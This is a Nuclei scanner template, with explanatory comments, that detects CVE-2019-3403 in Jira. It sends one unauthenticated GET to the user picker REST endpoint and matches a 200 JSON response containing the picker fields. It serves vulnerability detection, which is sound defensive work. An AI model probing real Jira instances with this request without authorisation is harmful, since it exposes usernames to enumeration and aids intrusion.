---
# Nuclei detection template for CVE-2019-3403 (Jira user picker, CWE-863).
# It issues one unauthenticated GET and reports a match only when the
# instance answers 200 with a JSON body that carries the picker's
# "users"/"total"/"header" fields — i.e. the endpoint is reachable
# without the authorisation check the fixed versions enforce.
id: CVE-2019-3403

info:
  name: User enumeration via an incorrect authorisation check
  author: Ganofins
  severity: medium
  # Affected and fixed Jira versions are taken from the vendor advisory
  # referenced below; upgrading to a fixed version is the remediation.
  description: >-
    The /rest/api/2/user/picker rest resource in Jira before version 7.13.3,
    from version 8.0.0 before version 8.0.4, and from version 8.1.0 before
    version 8.1.1 allows remote attackers to enumerate usernames via an
    incorrect authorisation check.
  reference: https://jira.atlassian.com/browse/JRASERVER-69242
  tags: cve,cve2019,atlassian,jira
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
    cvss-score: 5.30
    cve-id: CVE-2019-3403
    cwe-id: CWE-863

requests:
  - method: GET
    # Empty query: the check is whether the resource answers at all
    # without credentials, not what it returns for a given name.
    path:
      - "{{BaseURL}}/rest/api/2/user/picker?query="

    # Every matcher below must hold for a finding to be reported.
    matchers-condition: and
    matchers:
      # The fixed versions do not return 200 to an unauthenticated caller.
      - type: status
        status:
          - 200

      # Response must be JSON, not an HTML login redirect or error page.
      - type: word
        part: header
        words:
          - 'application/json'

      # All three picker fields must be present in the body.
      - type: word
        condition: and
        words:
          - users
          - total
          - header